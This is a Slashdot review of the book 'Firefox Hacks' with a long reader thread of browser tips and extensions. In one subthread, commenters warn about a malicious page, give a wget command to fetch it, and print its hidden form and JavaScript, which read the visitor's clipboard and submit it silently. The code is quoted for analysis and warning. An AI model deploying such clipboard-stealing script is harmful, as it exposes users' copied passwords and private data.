Firefox Hacks

honestpuck (Tony Williams) writes "If there is an application I run more often than my Web browser, particularly since I also use it as my email client, then I don't know what it might be. As a Firefox convert, that made the arrival of Firefox Hacks from O'Reilly a wonderful surprise." Read on for the rest of Williams' review. Firefox Hacks author Nigel McFarlane pages 368 publisher O'Reilly rating 7 reviewer Tony Williams ISBN 0596009283 summary A good, fairly technical examination of Firefox

The first of several books on the topic of Firefox hacking (two more are due from other publishers in the coming months) Firefox Hacks sets the bar quite high. The author, Nigel McFarlane, has already written a number of other books and articles on similar topics and knows his subject well. He has also enlisted the help of a number of other cognoscenti to cover the more distant corners covered in the book.

A Web browser is a much more complex piece of software than you may realize on first examination, and Firefox -- with the core Gecko engine surrounded by a large wrapper written in XUL and JavaScript -- provides a fertile ground for any number of changes and enhancements. Firefox Hacks does a good job of mapping out the boundaries of this space.

Over the course of the now-traditional 100 hacks found in the same series' other members, this book covers hacking with, on, and to almost all aspects of Firefox and the 'net. The book is broken up into nine chapters, most worth reading by almost everyone -- even the first, "Firefox Basics," taught me a couple of tricks for getting the best out of a slow (and expensive) GPRS connection. The others are "Security," "Installation," "Web Surfing Enhancements," "Power Tools for Web Developers," "Power XML for Web Pages," "Hack the Chrome Ugly," "Hack the Chrome Cleanly," and "Work More Closely With Firefox." I have to say I felt the chapter on Power XML (with 17 of the 100 hacks) was far too general on Web technologies and a little out of place; easily half the hacks in that chapter could have been dropped without any real loss to a reader's understanding of Firefox. I would have preferred more on the browser itself. No insult intended to Seth Dillingham, who wrote four of the hacks I'd throw out -- they are well written and do show how best to deal with Web technologies inside Firefox. I just felt that the space would have been better devoted to more "core" topics.

The first four chapters will be useful to everyone, covering mainly the use of Firefox. From that point, the hacks become increasingly complex as they cover Web development, then modifying the interface, before covering such arcana as creating extensions and custom builds.

I am hard pressed to think of a corner of Firefox not at least touched, though it must be said that the later hacks only touch on the topics covered without really providing a lot of depth. If you get to the last two chapters in the book, performing and expanding on the hacks, you will probably need a great deal more information and assistance to branch out on your own. McFarlane, however, points out the possibilities and gets you started. I didn't feel this was a flaw, just that a line had been drawn, as it must unless the book was going to be three times the size and price.

The book is fairly well written. The quality of writing and editing fall into that middle ground of "fairly good" that one expects from the average O'Reilly book, though not the "excellent" they can sometimes hit. The structure and flow are excellent, making the book readable in large chunks -- enough sticks that when you are back in front of the computer using Firefox you can remember a few things. (Or, sometimes, I remembered that a hint existed and was able to easily find and use the information.)

For a closer look there is a decent page at O'Reilly with links to six example hacks, the table of contents (listing all 100 hacks) and the index.

To conclude, I'm not sure I could recommend this book to everyone; it spends a little too much time a fair way along the technology curve for those who aren't ready for some programming, though for anyone who wants to get their hands dirty and perform some hardcore hacking on their favourite browser, then this is an above-average volume. For someone who is happy as "just a user," this book may be too much: wait and see what else emerges into the Firefox book market -- including O'Reilly's other offering, the soon-to-be-released Don't Click on the Blue E, which they describe as giving "non-technical users a convenient roadmap for switching to a better web browser--Firefox."

Also watch soon for a review of Prentice Hall's Firefox & Thunderbird Garage. You can purchase Firefox Hacks from bn.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

PDF Hack

[The_Rippa]

Where is the hack that lets you view the pdf examples of the other hacks in firefox without it locking up?

Re:PDF Hack

[Derek+Pomery]

http://www.mozilla.org/support/firefox/faq#acrobat
Not only "slowly" but also unstably.
Every system I've applied this FAQ entry to has much better performance.

Re:PDF Hack

[pjbgravely]

A 404 informative?, what gives?

Re:PDF Hack

[SkeptiNerd75]

Mozilla.org blocks referrers from Slashdot. Just copy and paste the URL into your browser.

Re:PDF Hack

[good-n-nappy]

I got this too. The problem is that the "#" is turning into "%23" for some reason. Use this link instead and search for Adobe.

Re:PDF Hack

[pawnIII]

Ever since 1.0.1 and Adobe Acrobat 7 came out, I haven't had a slow down or a crash when loading pdf files.

Re:PDF Hack

[Garion+Maki]

text from the page (managed to load it by changing the %23 in the url into a # like sombady posted higher up)

Why do Adobe pdf files load slowly in Windows?

Adobe Reader 6.0 for Windows loads lots of unused plugins on startup. The Inquirer has a great article explaining how you can disable those unneeded plugins and make Adobe Reader load faster. Basically, you need to do the following:

1. Install Adobe Reader 6.0 and notice where it is installed.
2. Navigate to that folder in Explorer, locate the plug_ins subfolder and rename this folder to plug_ins_disabled.
3. Create a new plug_ins folder.
4. Move the files EWH32.api, printme.api and search.api from plug_ins_disabled to plug_ins.

I've read the PDF pages on the site...

[Ron+Harwood]

...and I found out about editCSS and webdeveloper extenstions from there... they rock.

Re:I've read the PDF pages on the site...

Sure. You don't have time to browse through the extensions to see what's available for your browser, but you do have time to browse Slashdot and read the PDF the article points to.

One hack I want

[jerometremblay]

I want to turn off the damn confirmation every time i open a http: //username:password@site URL!

Re:One hack I want

[th1ckasabr1ck]

This isn't funny - I have the same problem logging into my company intranet page. It requires a username and password. Under IE these stored passwords are sent immediately. With Firefox I have to click the confirmation each time. It's enough of a hassle that I redirected my Firefox home page away from the intranet.

Re:One hack I want

[jerometremblay]

Yeah, but at least you can change it in the registry.

I suppose (or rather HOPE) there is a hidden setting somewhere in Firefox, but I haven't found it in about:config.

(and wth is the grand-parent modded funny? you people have a weird sense of humour)

Re:One hack I want

[Elwood+P+Dowd]

That's a different problem. Internet explorer won't allow you to submit a password in the URL anymore either.

The reason your intranet works for everyone on IE is because IE supports Windows integrated security. It can tell that you are who you say you are because your machine is joined to the Windows domain.

Re:One hack I want

[emilv]

That's actually a security feature due to the fact that it was widely used by scammers to write URLs such as
http://www.google.com\@scammersite.com
resulting in a redirect to the scammer's site.

Re:One hack I want

[cowass]

If you need windows Auth in firefox do the following: open firefox browse to about:config find network.automatic-ntlm-auth.trused-uris modify the value and enter in your intranet sites that you must pass your username and password to. For some site i connect to i also had to add values to: network.negotiate-auth.delegation-uris network.negotiate-auth.trusted-uris

Re:One hack I want

[The_Candyman]

there is a registry hach fie IE to fix it. e-mail me to get it.

Re:One hack I want

[darinf]

Try "http://somecompany.com" (without the "*") If it doesn't work, please let us know! ;-)

Didn't RTFA yet

[Kimos]

If there is an application I run more often than my Web browser, particularly since I also use it as my email client, then I don't know what it might be. As a Firefox convert

If there is any English that would make me not want to read this article, particularly since English is my first language, then I don't know what that might be.

Re:Didn't RTFA yet

[Vaevictis666]

Now, now. That's a perfectly valid sentence. Taking out the text surrounded in commas as an aside, the main thrust of the sentence is:

If there is an application I run more often than my Web browser, then I don't know what it might be.

The "then" might be debatable, but otherwise it makes perfect sense to me. And taking the aside on its own is fine as well, so I dunno what your gripe is.

Re:Didn't RTFA yet

[fm6]

The sentence may be validEnglish, but it's not clear English.

However, the suggestion that the writer isn't a native speaker is both bigoted and illogical. Only a native speaker could spawn that many subordinate clauses in such a confusing way!

Re:Didn't RTFA yet

[Hakubi_Washu]

I wouldn't bet, which is probably illegal in your country anyway, as so many fun things, like alcohol in public or hookers, who are a bit to "often-used" for my taste, on that, at least not if I were you, which I, who am not a native speaker of English, or whatever you Americans consider such, but one of german, which allows for very harsh sounding swear-words, am certainly not. :-P

Point in case: confusing subordinate clauses aren't related to the language they're expressed in, just to the Kafkaesqueness of the writers mind. Coders seem very likely to use such sentences in my experience, as they're trained to nesting complex expressions (usally involving brackets (such as these)) anyway :-)

Re:Didn't RTFA yet

[shellbeach]

Coders seem very likely to use such sentences in my experience, as they're trained to nesting complex expressions (usally involving brackets (such as these)) anyway :-)

but (beware (lisp (write (those who)))

Close

[TheSportsGED]

But if it doesn't tell me how to load Firefox on a memory stick for my PSP, I'm not interested.

Re:Close

[Lazyhound]

Netscape 7 is Gecko-based, and 8 is basically a Firefox reskin with a few new widgets.

Good about: config explanation

[spywarearcata.com]

An excellent book. The explanation of about:config and its mods are very useful.

I did the opposite of the Anonymity sub-chapter by putting my home page URL into my referrer string.

Re:Good about: config explanation

[irc.goatse.cx+troll]

He's not a hacker, he's a spammer. He's posting here to help his pagerank, and throwing it in useragent gets him linked on random public web stats pages. It's all about pagerank.

Re:Good about: config explanation

[Kizzle]

I hate seeing referrer spammers like in my webpage stats. You're not clever, just annoying.

Re:THE BEST FIREFOX HACK

[akira69]

You are an asshole. Don't click this link people. Bad news.

HTML instead of PDF

[caryw]

Hack 27: Fix Web Servers to Support Firefox Content
Hack 31: Take Firefox with You
Hack 43: Waste Time with Toys and Games
Hack 44: Tweak and Troubleshoot CSS Designs
Hack 69: Make New Tags and Widgets with XBL
Hack 92: Get a Custom, Prebuilt Version
--
Fairfax Underground: Where Fairfax County comes out to play

If you think the book requires too much coding ...

[WillAffleckUW]

... it spends a little too much time a fair way along the technology curve for those who aren't ready for some programming, though for anyone who wants to get their hands dirty and perform some hardcore hacking on their favourite browser, then this is an above-average volume.

If you're not ready for some programming, then, by definition, you're not a hacker.

Geesh, next you'll want the Flash version ...

Firefox Prototype

[therealfitzman]

The new Firefox prototype is amazing. It works by "neuralink" allowing you to think about what website you want to go to and it opens in the browser. The only caveat so far is you have to think in Russian in order for it to work.

Re:Firefox Prototype

[prostoalex]

The only caveat so far is you have to think in Russian in order for it to work.

I don't get it. What's the problem?

--Alex Moskalyuk

Don't click on the blue E!

[c0ldfusi0n]

Sorry for the slightly offtopic comment, but i have to post this.
O'reilly have a book called Don't click on the blue E! that's a kind of migration guide from IE to Firefox for disenchanted Internet Explorer users.

I just love the title of it. Frankly, how many Firefox users trying to get thir sister/mother/grandma to use Firefox (mostly because they're sick of being called to remove spywares/viruses induced by IE) have actually use that phrase?

Re:Don't click on the blue E!

[creep]

I don't. Aside from putting a Firefox icon on the desktop of all my family and friends' computers that I service, I also use the IE icon and point it to Firefox just in case they happen to click on it out of habit.

Nice review

[echocharlie]

Author did a nice job on this review. I will probably pick this book up. Here's a link to O'Reilly's official site for the book. NerdBooks.com has is carrying at 50% off.

XML and other quibbles

[fm6]

Why is XML not a "core topic"? Serving web pages as XML is the Next Big Thing, in my opinion. In any case, XML is a lot more relevent to most people's needs than hacking the browser as a game platform!

Not that anything was really excluded. They seem to have had a little trouble coming up with 100 hacks. Some I see on the list are interesting, but not strictly about Firefox (CSS, Bugzilla). Some are pretty lame ("Identify and Use Toolbar Icons"). Some are not even hacks (a list of customized prebuilt versions).

Some hacks do look interesting -- integrating Firefox with other apps, making chromes and extensions, and (as I said) XML support. Maybe these are good enough to justify the price of the book. Though a book about these specific topics might be money better spent.

Evolution of the word "Hack"

[standon]

I own several O'Reilly books, many of them relating to Hacks - whether it be for Postfix, OS X, et cetera. It's funny (or perhaps just interesting, depending on your sense of humor) how the term "hack" has evolved over time. Am I a hacker if I utilize a book to balance a shaky table? Of course I'm being a bit facetious with that example!

I understand this might be (mistakenly) modded offtopic, but hopefully the powers that be acknowledge the relevance.

Re:is there a hack to remove the 'cannot connect m

[seizer]

Certainly:

browser.xul.error_pages.enabled

Enjoy.

What it really does.

[spagetti_code]

Be warned - in case you are tempted...

This is a pretty ingenious script that

• Opens up windows (or tabs, depending on how you open the link) as fast as your computer can - 100% CPU
• Each window displays gay porn
• Plays a loud sound "Hey everybody I'm looking at gay porno"
• Behind the scenes it also copies the contents of your clipboard to this guy.

It works in IE and firefox. It is simply a page with an image, a flash movie, and a javascript that copies your clipboard to a field then 'submit()'s' the form, reloading the page.

Very simple and bypasses popup blockers (at least the ones I have on).

This has got to be a security hole in firefox, both on the ability to open windows/tabs, and copying the clipboard.

If you want to have a look, use:

wget http://firefox.on.nimp.org/index.php

WARNING: dont click on this link, just copy the wget command to a shell. Dont say I didn't warn you...

Re:What it really does.

[moonbender]

There should be a way to suppress resuming a session, like holding the shift key while starting FF. (Maybe there is a way - it seems like an obvious addition to me.) Or do it the Opera has been doing it since seemingly forever (well okay, version 5? 6?), display a dialogue after a crash prompting the user as to what to do.

Re:What it really does.

[tetranitrate]

I have the following config option set, and didn't get the popups. I read that firefox has had flash blocking functionality in for some time, but didn't enable it due to it possibly breaking things.

privacy.popups.disable_from_plugins = 2

Re:What it really does.

[Selanit]

I just want to say.. I have http://flashblock.mozdev.org/ [mozdev.org]Flashblock and nothing happened. It totally stopped that site. Its a great FF extension.

You didn't get the tabs, pop-ups and the gay porn -- but the contents of your clipboard were sent, unless you've got JavaScript turned off completely. Take a look at this (comments added):

<!--
Make a form, but use inline CSS to make it invisible (display:none).
-->
<form name="clip" method="post" action="index.php" style="display:none">
<input type="text" name="content">
<input type="hidden" name="send" value="1">
<input type="hidden" name="referer" value="">
<input type="hidden" name="user" value="">
<input type="submit">
</form>

<script language="javascript">
if(typeof clipboardData != 'undefined') {
// If we can get the clipboard, get it.
var content = clipboardData.getData("Text");
// Put it into the invisible form.
document.forms["clip"].elements["content"].value = content;
}
// Submit the invisible form.
document.forms["clip"].submit();
</script>

Then it has a second body tag containing the flash object that's responsible for the visible annoying stuff. I have to wonder what random stuff they're getting out of people's clipboards . . .

Re:What it really does.

[Redshift]

Ingenious. You are fighting back by trying to /. the site.

Re:What it really does.

[Avishalom]

I have to wonder what random stuff they're getting out of people's clipboards .
every once in a while you'll get a password that looks like
R5tR3e7Ptr
many sites, will send you the password in case you forgot it.
now do you transcribe it? , or Cut & paste ?

MAF

[real_smiff]

this "comes free" with the Mozilla Archive Format extension (adds an option to the page Save As type menu). I just tested it, page opened in IE, seems to work, a little slow maybe. as for your 2nd request, maybe someone else can help, i don't know sorry. btw if you didn't post anonymous you could see this reply easier..

how do you hack Firefox to give your sweety a kiss

[planckscale]

I'd like to share my browsing experience with my sweetie. Kind of like a status bar or something we can see real-time what websites we are visiting. It would be our choice if we want to share this info. I guess it would be similar to an IM but it wouldn't have to include chat. Of course, password protected sites would be unavailable. Basically I would like to see a click-able hyperlink in the statusbar showing me what website she currently has active. It could have a drop-down/up menu for multiple users as well.

Do you feel lucky, punk?

[werewolf1031]

Hey now, don't dis Firefox. That was one of the best Cold War-era Clint Eastwood movies I've seen! Hell, I remember watching it on the theater on that big screen when I was a kid and...

...oh, wait...

Re:extension link

[Jononon]

I'm confused, I only opened Firefox to look at gay porno, and now you're saying that's a bad thing ?

Re: Greasemonkey

[binarysearch]

Speaking as one of the "cognoscenti" who contributed to the book, I'd say that yes, Greasemonkey is a bit too new to have made it into the book. When I came onboard in late October 2004, most of the hacks had already been thought up and allocated. The deadline for the first draft of the hacks was November 22, and contributor's reviews were due by December 11.

Looking at the CVS repository for Greasemonkey ( http://www.mozdev.org/source/browse/greasemonkey/ ), it looks like the oldest files are four months old, which means that yes, Greasemonkey is too new to have had a chance to get in to the book. I imagine that it'll *probably* be featured in any subsequent editions. The problem is that Greasemonkey is really quite code-centric, far more so than most of the stuff in the last few chapters, and those chapters are already striking some as "too technical." Writing a hack would be tricky, as you'd have two main options, neither of which are particularly appealing:

* Delve into the nuts-and-bolts of programming to show users how to Get Stuff Done with Greasemonkey, which is outside the scope of the book, or
* treat The Code That Does Stuff as magic, and use e.g. Butler as an example of what can be done.

Of course, hacks.oreilly.com does allow you to submit your own hacks. If you want a job done right...

Re:is there a hack to remove the 'cannot connect m

If you do that, you're going to get lots of bugs, like the back button losing it's history. That's why the error pages are disabled. In 1.1, this should work right (in fact, it works properly in trunk nightlies right now).

Re:If you think the book requires too much coding

[computational+super]

Honestly - I was looking through the sample pages, and I didn't think any of it looked hacker-friendly enough. I'd like to read more about Firefox's internals (sort of like the book "How Tomcat Works", but written by somebody who can write) and extrapolate my own hacks from there. I'm sure this book has a target audience, but it's not hackers - a hacker would want some kind of a rough outline for fixing bugs and adding features to Firefox, but based on the pages on the O'Reilly site, this book is geared toward power users. Still a useful book, I'm sure, but has nothing to do with hacking or hackers.

Session Saver

[roman_mir]

By the way if you open a link like that and you have Session Saver extension you are out of luck :)

What you have to do then is kill FF, then go into the directory where /chrome/sessionsaver.jar file is located, open the jar file, extract sessionsaver.js, modify the onLoad function in the Session Saver by commenting out the piece of code that runs loops for openning new tabs/windows. Then substitute the new sessionsaver.js into the jar file and restart FF. Now the loading portion of SS is disabled. You can uninstall session saver, or you can go into about:config and modify sessionsaver.windows.session1 value by replacing all bad links with whatever other sites (even invalid ones).

Re:Session Saver

[The+Wicked+Priest]

Can you not bypass Session Saver by starting in safe mode?

Re:Haven't read the book..

[Osty]

But if they don't mention greasemonkey, then the only excuse I'll accept is that it's too new to appear in print. I'm using it at work to clobber that last webapp so that I no longer have to use IE...

You really should give a link for Greasemonkey, and to the script repository.

Also, shameless pimpage, but I've built a Greasemonkey implementation for IE, GreasemonkIE. It's still in development (missing a pretty major feature right now, which should be sorted out soon -- covered in the blog entry above), but it works quite well considering IE's limitations. GreasemonkIE tries to re-use existing Greasemonkey user scripts as much as possible, but other browsers have user script support too. The new Opera beta has an implementation of user scripts, and PithHelmet does the same for Safari (among many other features). Up until yesterday, IE was the only browser left out of the user script craze, but I'm trying to rectify that.

Re:If you think the book requires too much coding

[The+Good+Reverend]

That's nonsense. There have been hackers longer than there have been computers. Even the Jargon File gives multiple definitions, most not specific to programming. It's much more of an inclusive term than an exclusive one.

Re:THE BEST FIREFOX HACK

[Clover_Kicker]

So make the max # of tabs a configurable setting, with a low default. Everyone happy.

Re:how do you hack Firefox to give your sweety a k

Check out http://www.stumbleupon.com/

It's not spyware like what you described but rather will allow you to queue pages to your GF. When she hits her stumble button it will show your comment to her then load the page.

It's actually really cool. It does a bunch of other things too. I could go on and on decribing it to you but I wont. Go check it out, you wont be sorry.

Here is my stumble page as an example:
http://emfb.stumbleupon.com/

Re:extension link

[The+Wicked+Priest]

More seriously, I've changed my extensions link to point to http://www.extensionsmirror.nl/ . (You can change it via extensions.getMoreExtensionsURL in about:config.) It's far more complete and up-to-date than the official site.

Re:how do you hack Firefox to give your sweety a k

[The+Wicked+Priest]

My first thought was "Ew", but my second thought was "You know, there's probably an extension for that". And here's what I found with a cursory search:

Feed Me Links Toolbar - The Feed Me Links extension for Firefox/Mozilla shares and manages your links via any computer or browser. Tag links to classify them, share tags and links via email or comment discussions, browser your friends' links, etc.

Firefox Bookmark Share - Firefox Bookmark Share allows you to store your Firefox bookmarks, upload and download from your browser and share them with your friends and much more. All you need to do is sign up for an account, download the plugin and you're all set. The extension will create a folder in your bookmarks named "Firefox BM Share for [username]". This folder will be uploaded and downloaded.

If these aren't precisely what you wanted, check again tomorrow.

Re:Haven't read the book..

[quiddity]

if you have lots of bookmarks, then using favicons can severely bulk up your bookmarks.html file. 40mb bookmark files are NOT FUN.

add these lines to your user.js to get rid of all site icons.

// Disable Bookmark Icons
user_pref("browser.chrome.site_icons", false);
user_pref("browser.chrome.favicons", false);

(though it wont clean the code for known icons out of bookmarks.html)

Why is it so slow?

[nagora]

I'm using an old 400Mhz machine here and it runs Opera fine. But, I think I'd rather use Firefox or at least try it long enough to decide which is better. But Firefox is so slow that it simply isn't an option. It takes literally a second (that's 1000ms, folks) or more to draw a drop-down menu after clicking on it. Everything is like that - it's like using a computer in slow-motion.

Is there some known issue with Firefox that can cause this? I can't believe anyone is using the browser if it's like this for them, so I assume that it's not like this for other people. Or have I just been spoilt by Opera's speed?

TWW

Re:Download Manager

[Reziac]

I had no luck getting Mozilla (also with an annoying dl manager) and Getright (which I love) to play nice together either. However, I let Getright monitor the clipboard. So when I want to download something in Moz, I rightclick the link and pick "Copy Link Location", and most of the time Getright will pick it up, and I can then download it with Getright without any extra steps.

Worst case, I might have to open GR's status window and paste the URL as a new download.